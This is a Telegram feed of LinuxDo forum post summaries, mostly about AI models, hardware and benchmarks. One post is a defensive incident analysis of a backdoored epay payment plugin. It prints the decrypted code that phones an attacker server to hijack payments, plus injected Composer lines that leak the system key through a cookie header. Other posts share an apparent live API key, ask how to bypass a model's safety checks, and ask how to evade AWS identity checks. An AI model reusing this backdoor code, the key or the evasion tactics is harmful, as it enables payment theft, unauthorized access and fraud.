LinuxDo 新帖推送
166 subscribers
245K photos
305K links
Download Telegram
标题: 能维持一分钟吗?
作者: #Y0816
板块: #福利羊毛
编号: 2046831
帖子: https://linux.do/t/topic/2046831
时间: 2026-04-24 16:49:00
摘要:
uil:http://101.43.9.6:3000/
sk-X8cHXLlJM3UVvQsdtFtF9TgeyRmrvAFLkYhLKyYdy38IcLYt
还有25刀
标题: 也是在dy刷到L站了
作者: #xiaoyan
板块: #搞七捻三
编号: 2046832
帖子: https://linux.do/t/topic/2046832
时间: 2026-04-24 16:49:02
摘要:
标题: gpt5.5道德标兵,咋绕过啊
作者: #looch
板块: #开发调优
编号: 2046857
帖子: https://linux.do/t/topic/2046857
时间: 2026-04-24 16:52:12
摘要:
随便问两个问题就触发安全机制
标题: ollama cloud上架deepseek v4 flash
作者: #mi tu
板块: #前沿快讯
编号: 2046870
帖子: https://linux.do/t/topic/2046870
时间: 2026-04-24 16:53:14
摘要:
模型卡片:deepseek-v4-flash
标题: 氵一下 UU调查问卷: “你从哪里了解AI?” “Linux.do!”
作者: #奶油话梅糖
板块: #搞七捻三
编号: 2046875
帖子: https://linux.do/t/topic/2046875
时间: 2026-04-24 16:53:41
摘要:
“你从哪里了解AI?” “Linux.do!”
标题: Claude周限额重置时间提前了,一个周末要猛蹬了!
作者: #ironfish
板块: #开发调优
编号: 2046877
帖子: https://linux.do/t/topic/2046877
时间: 2026-04-24 16:54:06
摘要:
上次是定到周五0700,刚突然发现周日0100又要重置,这三天咋用得完一周的量! 通宵蹬车!
标题: DeepSeek-V4-Pro Benchmark简单解读
作者: #IfElse
板块: #前沿快讯
编号: 2046883
帖子: https://linux.do/t/topic/2046883
时间: 2026-04-24 16:54:54
摘要:
(话题已被作者删除)
标题: 今天都在讨论DS-V4,没人说一下gpt-5.5吗?
作者: #lwl2333
板块: #开发调优
编号: 2046912
帖子: https://linux.do/t/topic/2046912
时间: 2026-04-24 16:56:48
摘要:
今天看到GPT-5.5发布火速更新CPA(CPA作者更新速度真的快),然后在自己本地用上了5.5
,到今天下来,总体体验极佳,响应速度极快,回答质量有明显提升。最显著的感受就是能看懂5.5说啥了,有一种几个月前opus4.6的感觉(好久没有蹬4.6了。。)。现在5.5就是不说废话,输出更简洁,指哪打哪。现在是两个plus号在用,感觉有点不够,消耗太快了。
标题: 易支付系统与支付插件劫持后门与系统密钥泄露漏洞
作者: #Imx
板块: #开发调优
编号: 2046917
帖子: https://linux.do/t/topic/2046917
时间: 2026-04-24 16:57:28
摘要:
本次事件涉及针对 易支付宝二开收款平台的供应链攻击,攻击者通过向受害者出售植入后门的支付插件,并同步篡改系统底层文件,实现了对支付渠道的劫持以及系统主密钥的窃取。
​ 这里还是要说明一点,易支付系统一定要买正版,不要用不明来源的网站源码 不然被植入后门就不好了,还有支付插件如果有加密不能看代码的话 尽量不用 因为一般都是有猫腻的 比如说这次的就是
已确认的两类安全威胁:




威胁类型
受影响组件
危害




支付截单劫持
plugins/jfyui/jfyui_plugin.php
每笔支付可被路由至攻击者账户,资金直接损失


系统密钥泄露
includes/vendor/composer/ 两个文件
攻击者可获取 syskey,实现无密码登录管理后台、伪造任意 API 签名




一、支付截单劫持漏洞
1.1 漏洞原理
恶意插件在每次支付请求生成二维码之前,会向攻击者控制的服务器发起出站请求,获取劫持指令。若攻击者下发替换指令,插件将在 PHP 运行时内存中将收款商户信息(商户 ID、商户号、店铺名)替换为攻击者账户信息,完成拉卡拉下单。
整个替换过程仅存在于单次请求的内存中,请求结束后立即销毁,数据库中的商户配置始终保持原值,导致受害者通过后台巡查无法发现任何异常。
攻击流程如下:
客户端发起支付请求

├─► 恶意插件向 www.xitong.uno/zhangzitong.php 上报受害商户信息

├─► 攻击者服务器返回劫持指令(含攻击者商户 ID、商户号、店铺名)

├─► 内存中替换收款商户信息(数据库配置不受影响)

└─► 以攻击者账户信息向拉卡拉 API 下单 → 资金进入攻击者账户

1.2 攻击者基础设施




项目





劫持控制服务器
https://www.xitong.uno/zhangzitong.php


加密混淆平台
jiami.ka234.cn / jiami.xitong.uno


服务器 IP
45.207.199.14(香港,cognetcloud INC)


攻击者拉卡拉结算账户
822581052111E8T



1.3 恶意代码(解密还原)
以下为从加密插件中还原的关键逻辑,完整体现了劫持机制:
// 攻击者控制服务器(硬编码)
private static $ROUTE_URL = 'https://www.xitong.uno/zhangzitong.php';

// 步骤一:每次下单前将受害者商户信息上报至控制服务器
self::reportMerch($channel['appurl'], $channel['appkey'], $shopName);

// 步骤二:向控制服务器请求劫持指令
// 服务器返回格式:{"merchId":"攻击者ID","merchantNo":"攻击者商户号","shopName":"攻击者店铺名"}
$routeMerch = self::getRouteMerch($amount, $payType, $channel['appurl'], TRADE_NO);

// 步骤三:在内存中执行商户替换(仅影响本次请求,不写入数据库)
if ($routeMerch !== null && !empty($routeMerch['merchId'])) {
$merchId = $routeMerch['merchId'];
$merchantNo = $routeMerch['merchantNo'];
$shopName = $routeMerch['shopName'];
}

// 步骤四:以攻击者商户信息向拉卡拉提交订单
$orderResponse = curlRequest('https://jfyconsole.lakala.com/order/api/cashier/pay', ...);

// 步骤五:支付完成后向控制服务器上报截单统计
self::reportPayStatus($tradeNo);

1.4 检测方法
方法一:文件特征检查
正常的 jfyui 插件约 8 KB,恶意版本因附带加密后门代码通常超过 25 KB。
ls -lh /网站根目录/plugins/jfyui/jfyui_plugin.php

文件开头如出现以下格式,说明已被恶意加密:
return sg_load('DB54D5B7FDF1B257AA...');

正常版本开头为标准可读 PHP 代码(<?php)。
方法二:拉卡拉 API 对账
通过拉卡拉查单接口,以本平台订单号查询实际收款商户的 merchantNo 字段。若返回的商户号与本平台商户号不符,该笔交易资金已被截走。
方法三:订单号格式分析
被劫持订单的 api_trade_no 字段为 29 位纯数字,前 6 位格式为 26YYMMDD(缴费易平台订单号特征)。同时,劫持期间的订单支付完成率会显著低于正常水平(正常约 87%,劫持后因用户识别到陌生商户名拒绝付款,完成率可能不足 10%)。
1.5 损失评估(本次事件)
通过拉卡拉 API 对劫持期间(2026-04-20 至 2026-04-22)全部订单逐笔核查:




日期
路由至攻击者的订单数
实际完成支付(损失)




2026-04-20
151 笔
0 笔,¥0


2026-04-21
198 笔
0 笔,¥0


2026-04-22
83 笔
1 笔,¥50.00


合计
432 笔
1 笔,¥50.00



绝大多数终端用户因识别到收款方为陌生商户名而主动终止付款,在客观上限制了资金损失规模。
1.6 修复步骤
步骤一:替换 jfyui 插件文件
优先使用已知干净的备份文件覆盖。若无外部备份,epay 系统插件目录下通常存在原始备份:
/网站根目录/plugins/jfyui/新建文件夹/jfyui_plugin.php

确认该文件为明文可读的 PHP 代码后,将其覆盖至上一级目录的 jfyui_plugin.php。
步骤二:检查 crons.php
同目录下的 crons.php 正常大小约 1.7 KB(功能为定时轮询未支付订单)。若文件明显偏大,应同步替换。
步骤三:清除攻击者植入的 jiaofeiyi 目录
检查插件目录是否存在攻击者在主攻击后约 5.5 小时补充植入的持久化目录:
ls /网站根目录/plugins/jiaofeiyi/

若存在,直接删除整个目录。
步骤四:向拉卡拉举报
向拉卡拉举报商户号 822581052111E8T,申请冻结该账户并协助司法调查。

二、系统密钥(syskey)泄露漏洞
2.1 漏洞概述
攻击者在 epay 系统的 Composer 自动加载器文件中植入了两段隐蔽代码,利用 HTTP 请求头触发,将系统主密钥(syskey)写入 HTTP 响应的 Set-Cookie 头返回给攻击者。
受影响文件:
/网站根目录/includes/vendor/composer/platform_check.php
/网站根目录/includes/vendor/composer/autoload_real.php

时间戳伪造:攻击者将上述两个文件的 mtime 修改为 2023-10-20,使其外观与系统原生 Composer 文件一致,以规避常规的文件修改时间巡查。文件修改时间戳不可作为文件完整性的判断依据。
2.2 植入代码分析
platform_check.php 中植入的两行(正常文件不含此内容):
define('SERVER_PHP_VERSION', $GLOBALS['_SERVER']['HTTP_PHP_VERSION']);
define('SENTENCEIA', "Sorry for the con figuration sys tem key issue.");

第二行看似普通的错误提示字符串,实为精心构造的编码载体。按空格分词后:
索引 3: "con" → 作为数组键名的第一部分
索引 4: "figuration" → 取首字母 "f",拼合为 "conf"
索引 5: "sys" → 作为数组键名的第一部分
索引 7: "key" → 拼合为 "syskey"

最终解析目标为:$GLOBALS['conf']['syskey'],即 epay 系统主密钥。
autoload_real.php 中植入的三行(位于第 26–28 行,夹于正常 Composer 代码之间):
if (SERVER_PHP_VERSION >= 70200) {
$wordsArray = explode(" ", SENTENCEIA);
header("Set-Cookie: PHPSESSID=" . $GLOBALS[$wordsArray[3] . substr($wordsArray[4], 0, 1)][$wordsArray[5] . $wordsArray[7]]);
}

触发条件:HTTP 请求携带自定义请求头 PHP
标题: 如果有一个在美国的朋友,能干点什么搞钱呢(合法)
作者: #提肛小助手
板块: #搞七捻三
编号: 2046940
帖子: https://linux.do/t/topic/2046940
时间: 2026-04-24 16:59:06
摘要:
如果有一个在美国的朋友,能干点什么搞钱呢(合法)?
标题: deepseek-v4-pro error: 400,有人遇到这情况吗?
作者: #Wangyj
板块: #搞七捻三
编号: 2046944
帖子: https://linux.do/t/topic/2046944
时间: 2026-04-24 16:59:14
摘要:
如图,本来用的好好的,突然不行了。实测,v4-flash 还能用
标题: 决赛圈9700x和i7 14600kf怎么选?
作者: #半仙
板块: #搞七捻三
编号: 2046946
帖子: https://linux.do/t/topic/2046946
时间: 2026-04-24 16:59:17
摘要:
整机价格差不多,14600kf还便宜300,
主游戏兼顾一些生产力
9700x配5060ti 5999 ddr5 16g
14600kf配5060ti 5699 ddr4 16g
配了基本长期不会变 不敢再加价了
标题: 求个GPT200刀稍微稳定点的渠道
作者: #烽火聚诸侯
板块: #开发调优
编号: 2046954
帖子: https://linux.do/t/topic/2046954
时间: 2026-04-24 17:00:04
摘要:
想用来codex写代码,官网的200刀用不起,看下有没有稍微稳定点的,当然,也没办法追求绝对稳定啦,稳定点就行,不是专门写代码的程序员,不懂很多环境之类的,所以想要稍微稳定点的话可以少操点心
标题: 《飞升》还差几个赞腻🥰
作者: #Vantiboolean
板块: #搞七捻三
编号: 2046960
帖子: https://linux.do/t/topic/2046960
时间: 2026-04-24 17:00:25
摘要:
今天难道就是飞升的那天么
标题: DeepSeek V4,经典洗车问题
作者: #小丸子
板块: #搞七捻三
编号: 2046961
帖子: https://linux.do/t/topic/2046961
时间: 2026-04-24 17:00:27
摘要:
经典洗车问题,gpt、豆包、gemini都是走着去,难得啊
标题: 关于我想通过纯AI快速开发出来一个APP的天真
作者: #zzzero
板块: #开发调优
编号: 2046970
帖子: https://linux.do/t/topic/2046970
时间: 2026-04-24 17:01:04
摘要:
图1是我通过gpt生成的UI图,图2是用gpt5.4开发的代码,感觉纯靠AI还是很难还原出来UI图的效果,并没有想象中的那么顺利可以快速的开发出来一个APP,需要把UI图拆解反复调整可能才会达到我想要的效果吧。
标题: 大佬们,ccswitch报错:无法访问你试图使用的功能所在的网络位置
作者: #LuoYeah
板块: #搞七捻三
编号: 2046976
帖子: https://linux.do/t/topic/2046976
时间: 2026-04-24 17:01:35
摘要:
安装和卸载都会报错:
标题: Qwen3.6-27B和Qwen3.6-35B-A3B的nvfp4量化在dgxspark下面的速度表现
作者: #xy3
板块: #开发调优
编号: 2046994
帖子: https://linux.do/t/topic/2046994
时间: 2026-04-24 17:03:05
摘要:
模型来源
RedHatAI/Qwen3.6-35B-A3B-NVFP4 · Hugging Face
sakamakismile/Qwen3.6-27B-NVFP4 · Hugging Face
Qwen3.6-35B-A3B速度

单用户串行测试: num_prompts=20, request_rate=1, max_concurrency=1。低负载基线,用来看模型本身的交互体验。
吞吐 37.94 tok/s, Mean TTFT 543.42 ms, P99 TTFT 2878.45 ms, Mean TPOT 23.46 ms
8 并发用户测试: num_prompts=100, request_rate=inf, max_concurrency=8。模拟最多 8 个用户同时使用。
吞吐 164.39 tok/s, Mean TTFT 331.77 ms, P99 TTFT 786.20 ms, Mean TPOT 43.45 ms
固定 QPS 多用户测试: num_prompts=200, request_rate=4, max_concurrency=16。更接近线上持续流量,平均每秒 4 个请求。
吞吐 229.79 tok/s, Mean TTFT 521.67 ms, P99 TTFT 4542.64 ms, Mean TPOT 62.82 ms





场景
成功请求
Benchmark 时长(s)
输出吞吐(tok/s)
Mean TTFT(ms)
P99 TTFT(ms)
Mean TPOT(ms)
Mean ITL(ms)




单用户串行测试
20
136.99
37.94
543.42
2878.45
23.46
24.17


8 并发用户测试
100
135.85
164.39
331.77
786.20
43.45
44.19


固定 QPS 多用户测试
200
194.69
229.79
521.67
4542.64
62.82
62.22



Qwen3.6-27B

单用户串行测试: num_prompts=20, request_rate=1, max_concurrency=1。低负载基线,用来看模型本身的交互体验。
吞吐 11.68 tok/s, Mean TTFT 1078.83 ms, P99 TTFT 14364.02 ms, Mean TPOT 81.68 ms
8 并发用户测试: num_prompts=100, request_rate=inf, max_concurrency=8。模拟最多 8 个用户同时使用。
吞吐 79.13 tok/s, Mean TTFT 678.16 ms, P99 TTFT 4253.76 ms, Mean TPOT 89.96 ms
固定 QPS 多用户测试: num_prompts=200, request_rate=4, max_concurrency=16。更接近线上持续流量,平均每秒 4 个请求。
吞吐 132.89 tok/s, Mean TTFT 428.64 ms, P99 TTFT 761.94 ms, Mean TPOT 108.11 ms





场景
成功请求
Benchmark 时长(s)
输出吞吐(tok/s)
Mean TTFT(ms)
P99 TTFT(ms)
Mean TPOT(ms)
Mean ITL(ms)




单用户串行测试
20
445.13
11.68
1078.83
14364.02
81.68
81.37


8 并发用户测试
100
280.35
79.13
678.16
4253.76
89.96
89.79


固定 QPS 多用户测试
200
336.47
132.89
428.64
761.94
108.11
106.61



总结
由于dgxspark的内存带宽和cuda核心都比较弱,只是内存比较大,能跑MOE模型还是优先跑MOE模型。这里跑Dense模型速度快砍半了
标题: 关于aws账户注册和付费流程,避免提供水电单请教
作者: #专注于小白教程
板块: #搞七捻三
编号: 2046995
帖子: https://linux.do/t/topic/2046995
时间: 2026-04-24 17:03:13
摘要:
想要注册多个账号,直接使用信用卡开通付费账户,
开通付费账户后,不开机,存放3个月再用?
可以避免被要求提交水电单吗